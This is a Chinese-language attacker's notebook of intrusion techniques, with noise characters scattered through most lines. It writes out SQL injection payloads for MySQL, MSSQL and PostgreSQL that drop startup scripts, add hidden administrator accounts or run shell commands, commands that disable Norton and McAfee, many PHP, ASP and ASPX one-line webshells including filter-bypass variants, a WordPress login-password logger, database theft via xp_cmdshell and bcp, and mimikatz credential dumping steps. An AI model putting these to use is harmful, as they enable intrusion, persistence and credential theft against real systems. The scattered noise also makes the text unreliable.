- c4 G* s& U+ v- k- P9 `; u* x/ F
中文版本操作系统中针对mysql添加用户完整代码:. p. s5 p( L. b) ?& g6 J
3 R1 i; w* w5 ?- ^6 W' @use test;- @! U* D# p: J5 t5 I
create table a (cmd text);
, p6 @' L' Q# w0 ]9 u8 m# Oinsert into a values ("set wshshell=createobject (""wscript.shell"") " );; k. B/ ]6 T& z5 [
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );' q% z# p5 `. Y! \6 K
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
1 I8 G! x$ ]4 \# d+ J" y$ qselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";0 i0 X- ?# `( }. b3 V t: P
drop table a;
) C0 G2 {+ R8 O8 A) i3 F
9 [# `' l/ G/ w1 Z- {# c5 I英文版本:" U9 C* e7 c# E) f2 }
8 v( \+ ]! S5 D% a3 r' A
use test;+ H0 ?8 t7 g+ M( N( d8 p
create table a (cmd text);9 f8 @! {5 N/ s2 Z- o% v+ p
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
+ T7 \6 C" f J8 {1 P- B7 Q; cinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );- t& _8 l+ a) Q. Q
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );" W3 G. h, y4 f3 ^) f, {: e
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";6 P/ s X: y, Y1 i- {
drop table a;
/ P0 {$ L$ Y' _6 d& }4 g" k: t; L1 X% o# r
create table a (cmd BLOB);6 L( v7 Y$ A, [ ?( D6 v
insert into a values (CONVERT(木马的16进制代码,CHAR));
5 M8 t5 T2 L# S" E. n$ K! e7 N) t' Iselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'2 v- s X0 z1 W' y5 p
drop table a;& J+ }+ }2 P- e
1 _8 ?- ?- B, ~+ P) G% Y
记录一下怎么处理变态诺顿5 q/ n* g. r6 P" J+ N! y
查看诺顿服务的路径+ h6 H) w* K+ o; u
sc qc ccSetMgr1 t4 s& w) U' u% t. ~; J, b+ Q l! c0 h
然后设置权限拒绝访问。做绝一点。。
! ~" _. `3 V$ u% x, ]* Tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system$ x% K- h P% y# y9 b8 f5 z! u7 x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"* x5 K/ S! A9 a9 ]0 ^
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators7 @& z3 a0 y- o3 Q; n. Q' s; f
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone! D2 o% o' V+ N. n t; M
2 z& l k' F5 {) |2 t然后再重启服务器. e# U, l$ |" G/ r3 Q3 i1 ^
iisreset /reboot
) ]3 g6 K+ X/ d3 g& E这样就搞定了。。不过完事后。记得恢复权限。。。。
- o9 ~/ v1 w: O9 u. i+ [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F" `* x% o! |% z" a# s" W* g4 }
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
/ d; b: U+ v) C% c N/ Ucacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F! u& f9 `4 t# X/ w) [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
9 _+ B) j5 ]& JSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin$ @. z8 `' B4 j
7 ^- _) e$ C8 } P! A
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
' ~0 w* G. v% z* j2 |1 p1 w3 q- V8 m$ f1 C Q1 h
postgresql注射的一些东西3 l, C5 S+ e P6 @4 `
如何获得webshell, P) q m+ [/ T! A) P/ Q5 F
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
3 ?% [' K) y9 }+ }- Fhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
6 Z! w4 _ k& rhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
- ~' ?4 O; J5 {+ I1 {/ d0 |6 v) y如何读文件
5 c3 t: p* w* j& ohttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
6 w# c# c0 u9 |3 n7 c9 w" \http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’; P& y6 L5 H+ _
http://127.0.0.1/postgresql.php?id=1;select * from myfile;2 g: e. r4 F6 g- j1 b; V) M
- Y% w Z9 |; @7 h' m2 O! bz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
0 ^! x% O7 k* Q: s4 H8 y. x/ j当然,这些的postgresql的数据库版本必须大于8.X
- S$ _5 ^8 q; q5 m* c. M) O; P, t创建一个system的函数:
* f; y3 g* A8 [/ l5 L& L: b% ?CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
/ h3 C4 b4 n4 g+ q$ K) S& p: {7 P X) ~
创建一个输出表:" _3 o# q* M5 L3 G% V
CREATE TABLE stdout(id serial, system_out text)
. u" C. Y/ y1 _7 M! \5 }2 r4 D0 D8 Z7 {. l* P. f) j/ B
执行shell,输出到输出表内:- U% U; u. v: U8 F; R
SELECT system('uname -a > /tmp/test'), H1 J- i5 |7 ]' @
6 c" [4 ^ d1 M* ^2 P
copy 输出的内容到表里面;3 y c* ~9 l- |& `, d* f* P
COPY stdout(system_out) FROM '/tmp/test') Q h- m7 i' S
$ P" g! C$ p) h
从输出表内读取执行后的回显,判断是否执行成功
. w2 M2 P) i7 K/ p: c$ I* K# o
j7 \/ V& F+ r- a$ JSELECT system_out FROM stdout
( N# p. G7 y2 M. a下面是测试例子
' {9 U; i5 j$ d9 O: j5 O! ]% h8 }$ b- E! n8 E6 S
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
& x' m8 B4 ~% g% {* J! e: N
; N+ d* r- }; T5 [/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
) G6 G8 s1 p6 B6 _! i# |STRICT --, H2 ^, Q5 z1 n7 K- t# q8 P/ m
* q7 U" j8 v5 Y, J
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
! [7 y& V% @( C4 C3 _- \4 K$ _: F0 W
2 n& C l/ {* d7 { O z/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --, r& ?) m) M- b4 v% G& C' e7 G
9 q- W+ m/ {& I# q7 [2 r/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
8 }6 Z' N$ W, _net stop sharedaccess stop the default firewall& P% T N4 J3 ?" r! G# Z
netsh firewall show show/config default firewall7 b/ Z! J# B( E) j( T7 {
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
# N- S4 r3 L8 Z9 Onetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
5 h; D5 R7 b! R5 h3 R修改3389端口方法(修改后不易被扫出)
2 R; n; I1 y% K: z; R# A. e修改服务器端的端口设置,注册表有2个地方需要修改) j& k- `4 J, h6 Z5 b" F/ Y
! D2 @3 R, X4 R[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp], W2 H' P& q; J8 O5 b" w- {1 \. G
PortNumber值,默认是3389,修改成所希望的端口,比如6000
8 c) b3 @- W: E6 t, _4 @9 c
4 u# l$ U& g& `% L; S第二个地方:4 U* X7 U. {) V
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] & D# f+ H4 }6 p: ?4 F% Q6 P3 Z
PortNumber值,默认是3389,修改成所希望的端口,比如6000# ]' M7 |: n( s' L$ O4 u
. c/ P6 M) O7 J! m" }. p" x# Y. u现在这样就可以了。重启系统就可以了1 l9 _% ~7 d2 u. X* B$ t7 A5 x
' r, \# b) X- R) K# o
查看3389远程登录的脚本$ }+ n4 |- [% v; X
保存为一个bat文件$ s/ O: \) J* V1 `" g- i8 Y& D
date /t >>D:\sec\TSlog\ts.log4 ~3 y6 Q$ U* _
time /t >>D:\sec\TSlog\ts.log
5 @/ ]3 M) Y, Q+ i- Fnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log4 b7 o3 C) E- R* V) M
start Explorer3 `* `) }5 \) j5 W5 z6 u* @6 w
# M; v$ K( k, z$ S! Y' D
mstsc的参数:& K3 @6 \# ]: J3 B
8 x/ e! H, x$ T; ~: G! d, o远程桌面连接/ m L% { d* l: H
( u$ ?$ B& V4 U `+ v
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]" g; u7 g5 ^8 }
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /? _) N- ]7 e8 S8 C1 e0 L; M
; ~/ F; ~- K8 o5 }9 t R! y! o& U<Connection File> -- 指定连接的 .rdp 文件的名称。9 x5 R- }* `( x, T5 S! p2 F0 S. L, M
' _& U& G" z, `$ R/ ?/v:<server[:port]> -- 指定要连接到的终端服务器。+ u7 g, d( m3 Q
$ _6 X! E2 m+ n' b: z0 X
/console -- 连接到服务器的控制台会话。4 @/ R4 k, T [/ G2 s9 T3 B
: V, H5 ?# E6 f/ u4 Y/f -- 以全屏模式启动客户端。
* X/ c& u' g6 W3 e J8 \. u, i' n3 g E" N. C7 z
/w:<width> -- 指定远程桌面屏幕的宽度。
, `1 x: T% F9 O: e" f! d8 f5 f" N/ S6 K' S' L
/h:<height> -- 指定远程桌面屏幕的高度。& a8 Z7 S2 b7 s6 Q% M
+ X) {+ D% }; _" _
/edit -- 打开指定的 .rdp 文件来编辑。* G3 w! s4 ^) e' O/ f! _- [
' G6 q; }2 S# W& w/migrate -- 将客户端连接管理器创建的旧版
7 k) ~" z( c2 v# H连接文件迁移到新的 .rdp 连接文件。
6 d9 [& o% R8 }& M, f8 y) w. X$ g5 B
8 S8 L6 l% Q3 {8 s1 c
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
- q! ], ^+ R1 k7 Wmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
; `) u5 t; L5 V+ U2 f
4 e) a7 m) R: j命令行下开启3389
1 q5 g! k3 L" R' c* Lnet user asp.net aspnet /add: I- V! C! @$ ~8 d0 ^1 f
net localgroup Administrators asp.net /add
* ?! B3 t& c$ o( dnet localgroup "Remote Desktop Users" asp.net /add* F* o+ @3 p7 v# W' D$ j
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D, e% Q. t' J) M9 e" w+ x
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
9 c1 ^7 M4 L2 N4 S8 Uecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 14 i! e& o" v4 @ u' T- ]
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
$ n+ k) o+ @9 r3 h% f, H& n- asc config rasman start= auto
3 j2 o/ A) K* Q! u: O& S1 csc config remoteaccess start= auto
9 X9 N" x& }/ Bnet start rasman
) g; s( \9 I; d' _net start remoteaccess
* s4 O8 y ~5 E& {) Z% HMedia
1 \2 c; M+ T7 s7 S4 X<form id="frmUpload" enctype="multipart/form-data"7 ^8 ?& c$ e% @
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>, [) ^5 t" {, K2 p/ r' l. x
<input type="file" name="NewFile" size="50"><br>! E: m4 C- V( k* ~' A
<input id="btnUpload" type="submit" value="Upload">, t, b3 r3 S' N0 y; Q
</form>
7 m3 g4 a& C3 M
- D2 T2 k9 [! x) U# P: a$ dcontrol userpasswords2 查看用户的密码; e& g. E2 w9 _ T
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
5 @7 `6 ]: `9 M3 @3 J' dSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a. M. B( R$ G4 M, B) ^
/ L! P$ {( t" ]; N& E1 Y! S$ q: s7 z
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:4 P" g+ i' S( j& o8 t' r% U
测试1:) t0 t* `( }# D
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
y/ o/ y# Z& a1 b. S2 K; L O, ?* A; U+ ^* ^+ ` i- G
测试2:) m) _" ?7 S& x) h; k' u' z& v6 o# Z
0 I- ] {$ O$ t* Vcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
1 `1 l- D9 s& e/ X; J; t$ d' `4 n0 F! O2 {+ \ i& _
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
. y4 x8 j0 w1 H& U6 U* F% g, G" t" z' s
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1* u2 x' e' T9 p7 _* s; [
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令7 d5 l, O! w3 g
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
% a- ` Q, S$ _1 e7 T" u% Bnet stop mcafeeframework
: ~9 L: c n3 F( inet stop mcshield- r( \2 s- s5 I
net stop mcafeeengineservice
) x1 V8 Y2 {! j4 B# m0 hnet stop mctaskmanager4 p, H3 v% L/ G
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D; t W( `, D x" a8 C9 Q
( r8 X: d& h5 ]" i% x, x/ U( L( l
VNCDump.zip (4.76 KB, 下载次数: 1)
5 V) T6 ^ X2 }# t* s; x+ k密码在线破解http://tools88.com/safe/vnc.php
4 w2 S7 a( y* P. M3 u }VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取$ Q6 }) A- k J0 Z
}" o3 W2 X. e2 P
exec master..xp_cmdshell 'net user'
' y/ Y* Q0 l1 S- \# omssql执行命令。
* @) {* e/ a) j- v1 T获取mssql的密码hash查询8 ~/ ~* ~, q% k( A! z0 _8 @
select name,password from master.dbo.sysxlogins
0 k% A# M: h' d8 O6 K& P T3 ~
1 b( c. z% j2 O" [# w7 w3 Hbackup log dbName with NO_LOG;8 a2 o; [5 l4 I, P
backup log dbName with TRUNCATE_ONLY;" }; o0 a5 Z- y
DBCC SHRINKDATABASE(dbName);( V) H+ K, ?! l& l0 |/ l9 T
mssql数据库压缩
2 l0 @0 [7 t% S$ v2 W/ i) `8 P. w, f' N
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
+ C) K- P' G; @将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。& ]% L0 Z. R5 m
' J8 m; c! O; N- u! u6 _
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
5 Q* `# m: x( O3 `# K备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
& @5 j' I1 a# p! V5 E: B3 ]; Y. U) `& y9 i: a
Discuz!nt35渗透要点:0 j0 A, ~' c; ]! W- D+ R% I
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default6 Z/ Q) | R `4 a
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
; v# V" |% s) m+ B( a(3)保存。
0 r( ^* b" ]9 y8 e(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass: M! J |' q9 U9 U
d:\rar.exe a -r d:\1.rar d:\website\7 t8 t5 r4 u% W' W1 q
递归压缩website! R9 G5 R. j) s9 Z2 S- f
注意rar.exe的路径
9 A7 t6 v, {8 c8 G( |/ P/ ] X# S; C" q# N$ c
<?php
) w S- d5 T! a" p$ r! ~
& I- a$ c5 W4 z* X6 g: ~$telok = "0${@eval($_POST[xxoo])}";
1 Q3 b5 r$ n" D# X" L& f, l
! K6 Z2 [3 W5 N4 |# F4 j* p$username = "123456";
+ E- ]6 F7 ~0 L# g+ l' r; v# ]( {% i. a+ b8 s5 j! X9 R
$userpwd = "123456";
6 [' v n8 S1 W; m v
2 j3 h0 A3 s0 t( Q$telhao = "123456";
! i0 c6 T1 C# H: f: ?1 h
; `6 f2 b- u( b' [& b$telinfo = "123456";2 w3 U% G( T( p1 ]
3 `5 A; O8 B& \2 m?>2 ], E3 r. E9 M) F6 k
php一句话未过滤插入一句话木马
, m' s: M! ?! u9 K
- i; t+ y- C( k站库分离脱裤技巧
" s) l2 Q5 |4 X# ~; texec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
5 v: H) j/ O0 J. y' O' m; L. t: Bexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
4 f& ~1 M1 F" ^% p4 V5 @1 _) F9 N条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
& W' P" W; O2 z0 |; P1 k这儿利用的是马儿的专家模式(自己写代码)。% O- Y; ~, E. x8 Q, B1 u$ O2 c% J* O
ini_set('display_errors', 1);
5 N3 ^. ]& m9 c: E3 o3 ~" t! d/ mset_time_limit(0);
0 l6 f R) S4 T4 Oerror_reporting(E_ALL);
0 ?" h# b* F0 B2 \& s4 T6 _5 J# I8 s' g$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());1 w) C7 t x0 L" t0 s( [
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());* @* [9 E. ^/ N) W6 S; a4 ~+ n N
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());6 }2 v7 {% A8 V' H) C
$i = 0;
, `) [, W; a6 E, ?4 ?. v$tmp = '';; d, Q2 {/ H, _3 a! X( O% v
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {) O3 P. h {( ?1 g; N
$i = $i+1;/ f5 W+ |/ L$ J
$tmp .= implode("::", $row)."\n";+ i) y* n( J# ?& d6 J+ ]- d
if(!($i%500)){//500条写入一个文件2 E: }9 f3 O& ~0 H+ V
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
/ L1 @8 j8 Y8 L# [" W file_put_contents($filename,$tmp);7 e2 R% r2 p* V/ ?
$tmp = '';
' y3 w6 a/ @2 O; i5 j }8 H: m( [* M6 [8 `9 D% ^
}: k4 G; `, X+ k9 K7 C
mysql_free_result($result);
! J: B( h( Y& s7 T, |
! }/ h4 c9 A+ b8 j$ }6 y g" w! y2 U9 e7 e6 R: w1 }
1 b4 I" V, Q' n& _6 \//down完后delete
1 p" }1 u- M1 z. E7 l$ f4 q5 H0 {
" c( O- b' G% t$ u0 [( ]4 b. {8 L
6 e" {2 H7 p* ` W9 cini_set('display_errors', 1);
; p/ u# X! g) J1 f% o1 Y' herror_reporting(E_ALL);
/ |2 C% @% [, E6 d5 C3 D/ W$i = 0;# ]7 `: J* I4 t& L6 P l& {
while($i<32) {
* U+ u- x" L4 V8 e) v $i = $i+1;
3 i2 l% v7 e; Z1 s5 [# W $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';7 z! i$ Y" o9 b0 W- ]
unlink($filename);; g1 C( e6 S2 Q* ]! Q9 E
}
3 D0 F! p4 _; Z2 o4 w) ^httprint 收集操作系统指纹
7 M7 u4 X2 L+ N扫描192.168.1.100的所有端口- F9 O8 b" D; ?8 t" \+ C! a" g* e
nmap –PN –sT –sV –p0-65535 192.168.1.100* M/ V' W4 H6 S- O9 W8 U
host -t ns www.owasp.org 识别的名称服务器,获取dns信息4 [/ d4 P* ]. C v
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
! ~" p3 Z7 O, u# ZNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
2 ] O$ X( V0 ~" V3 `( q) m- g. |6 |1 U9 H
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)0 _3 L, R6 ~4 _, w: X9 m' v; d' g
9 n6 Q/ t! f& N/ a/ L MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)# r6 g6 p7 j) }) e! b9 \5 w' w5 A
! \8 k% S" o8 a Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
( t0 c: T( [' U5 N, Z O- T/ w4 w$ D, d% x) _
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
# T; U, j2 N. A F
|' E0 |- Z* B http://net-square.com/msnpawn/index.shtml (要求安装)
0 W G) W6 c; f; E) x7 F* y( Q& n8 V6 b! y
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
% c# i9 T: b8 T9 k+ M4 f5 r& U8 J) d# Q! z& x' d* U
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
- v! N3 y4 ~' Mset names gb23123 f/ U) }' u4 Y( h6 L
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。7 E4 t. p/ r9 t, v' n
8 ?0 e7 G2 z; k5 Qmysql 密码修改# f3 m4 M$ Q" @* w9 A
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ! D9 y1 n0 }. d( D) z, n
update user set password=PASSWORD('antian365.com') where user='root';
8 ^" x4 |, D2 R6 O# oflush privileges;
( x2 W! W& I. @0 J; N: g高级的PHP一句话木马后门
. j7 t6 Y; j% A3 j
3 O1 G0 R3 J3 o; ~* O7 S* A" w: P. J入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀6 S5 S2 Q. ^! ^2 d
( k) P N+ i* j5 o
1、7 m$ j# x3 L$ O! ^+ K% ?# j- K
- b' m& z" w% p. a$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$ g8 E" J- ^3 ?* J4 m) [ E- W" q: D( s. G7 W1 C$ w
$hh("/[discuz]/e",$_POST['h'],"Access");
* p1 j" b1 T. \+ r$ f
5 e, }4 i6 `/ Z9 v4 y; y N' W5 |//菜刀一句话
! n( h' p1 `: k: a+ Q( n4 U- `* V2 E9 q) U3 E; }- q
2、
8 ~* t. q- m+ `+ |( P5 z" I! G, ^" L( X b6 ~3 D
$filename=$_GET['xbid'];
. ~4 W( N! R: T" v3 E) q; `' h- n$ t* }% v( R" i2 `
include ($filename);) V/ Q5 U/ `9 T
6 {7 a& A: r% R$ U3 N; l, ~" ~
//危险的include函数,直接编译任何文件为php格式运行5 c0 @3 j' m8 z3 k& u7 I6 O; y
9 Z5 W5 ^) P9 I5 e3、% W9 ?. f6 \$ ?/ M; Q, V
* D9 _7 k7 {3 b _8 n$ s) J* B0 |3 }
$reg="c"."o"."p"."y";/ J; w/ o! d* h7 U
$ i; b8 i5 k T3 a) G# J9 x R- W: o$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);: E: D! w' H% J1 L9 }0 c
' \. {* B, @& @; j$ k
//重命名任何文件3 A4 e- x5 D9 ~3 a
) K: K0 G" ~$ T: `4、2 O* O3 v) c( L) i0 ?* \$ V
0 u( W5 h7 ]' d* W6 m& V; L
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";! h: U. v; }! h: N- F) N
8 D5 K, n5 t% _) `; h8 h; e
$gzid("/[discuz]/e",$_POST['h'],"Access");
1 B& N0 A8 Y6 t$ W$ k" C6 t, n+ q( S }2 }6 H, [. {
//菜刀一句话9 i% y8 o7 p1 a
+ l3 g+ @( Y# x# W" H$ k$ x5、include ($uid);7 k; q% {$ \+ S' k6 d
6 K4 j& ^% e' e+ h7 k//危险的include函数,直接编译任何文件为php格式运行,POST
4 p/ H* n9 u% q; Y3 F
7 U% K3 |# Q% Q9 j _% Z
$ E3 M: u# I4 [/ m8 o0 T R, o//gif插一句话- N3 N& @' ~, ~0 l
; B l) e7 E! |7 u
6、典型一句话
' P. D* M4 |5 b% J+ p% K
$ r! E% w) z$ Y3 M- s$ Q Z/ A2 Z程序后门代码% k) ]4 e. ]4 \0 u$ U
<?php eval_r($_POST[sb])?>3 h6 D0 [4 R* w+ S
程序代码0 ]$ p6 W, v( J
<?php @eval_r($_POST[sb])?>' `9 _3 k8 ^* q* Q! Z- l0 |
//容错代码: @% K$ D m( }5 D( D5 R. u
程序代码
4 K' z5 a8 i; X! p, p1 B' Y& q<?php assert($_POST[sb]);?>2 ~- E4 R: L0 e/ X9 S) P7 i# V
//使用lanker一句话客户端的专家模式执行相关的php语句: y- m, [0 |, B) K+ E
程序代码
# S1 `4 A5 H) l5 K0 f% R" X<?$_POST['sa']($_POST['sb']);?>
- ?, y7 w' ] O+ N* Q; p程序代码7 L7 R9 [& `- d* x. ]# k
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>0 X. }) }) x L/ \
程序代码
' i5 p' n8 l) c# w<?php
8 `2 I6 }8 u5 y# k5 r- q@preg_replace("/[email]/e",$_POST['h'],"error");
7 U/ L1 _% e" B# D& N3 B" \?>9 x1 b5 D, {# m+ g# F
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
0 x4 g! }% `6 @: j" P! V1 y程序代码" \% r. w% C3 V! w
<O>h=@eval_r($_POST[c]);</O>. h& q, r$ c/ L; c
程序代码
% R0 e7 L# R. J. M7 X4 q, c<script language="php">@eval_r($_POST[sb])</script>8 L9 V3 n J- X4 ^& x9 f/ j
//绕过<?限制的一句话$ ~. s- W! G# P4 L( c
3 W3 \- G6 m( k- D( H
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
( H0 {9 s u6 D: Y详细用法:
) W/ H+ c. Q; p9 k1 G% q: X/ R1、到tools目录。psexec \\127.0.0.1 cmd" e, ^2 J1 [. _. l( s
2、执行mimikatz" w, _$ _5 I1 L+ p2 N7 [' c7 l
3、执行 privilege::debug* o+ }" `$ }4 c2 x2 i
4、执行 inject::process lsass.exe sekurlsa.dll
4 i2 k/ S) X8 i9 ` M3 F% y5 X5、执行@getLogonPasswords- ^. S9 o6 z7 x" a {: }
6、widget就是密码, n! t6 K9 A; E4 A6 E
7、exit退出,不要直接关闭否则系统会崩溃。
$ J' y8 l- ?5 W% g' P4 h0 A0 f5 F% H1 l$ {
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
& b* w9 Q( `: o4 h# g
7 x& c0 ] q/ z! n* Q; g# ~自动查找系统高危补丁; c, x; c" k- _
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt. c; p& A7 y7 l' ?9 [
& l- C5 F7 T2 _9 D7 j突破安全狗的一句话aspx后门2 E! s$ N5 k2 f) K1 l
<%@ Page Language="C#" ValidateRequest="false" %>
0 Z) d* Q q9 r* [- w<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
4 z d& x: x& j$ h% g0 Twebshell下记录WordPress登陆密码
8 J" Q! |$ d( \+ a0 y xwebshell下记录Wordpress登陆密码方便进一步社工1 ]" a; ?5 Z( _
在文件wp-login.php中539行处添加:
+ }" D6 h' t( `4 h [// log password5 x0 ^0 M! i! b0 ]
$log_user=$_POST['log'];
1 n' W* Q2 L" v! T) n$log_pwd=$_POST['pwd'];2 u) n! e" ]0 ~% g3 y0 x7 l
$log_ip=$_SERVER["REMOTE_ADDR"];
& d2 S4 \/ |5 _1 z$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;2 E" v- L% R% x& _. {
$txt=$txt.”\r\n”;
f. ?' x* L1 ]" z: }2 Iif($log_user&&$log_pwd&&$log_ip){, {' s& g" v# e- h. I9 c+ l5 d
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);6 ~, l, t @8 i" \
}# k) H" C8 p" _! M3 ^/ m- Z
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
7 ^; z! i- K* ~& F$ |就是搜索case ‘login’
- p& V3 i& V, D在它下面直接插入即可,记录的密码生成在pwd.txt中,
8 T0 r" b& w2 T5 m9 v其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录* @& W% a; |) g' ?; E) }+ n
利用II6文件解析漏洞绕过安全狗代码:0 u1 K& T" U+ U6 \, w
;antian365.asp;antian365.jpg
1 X! z" \, V0 X/ Y( K
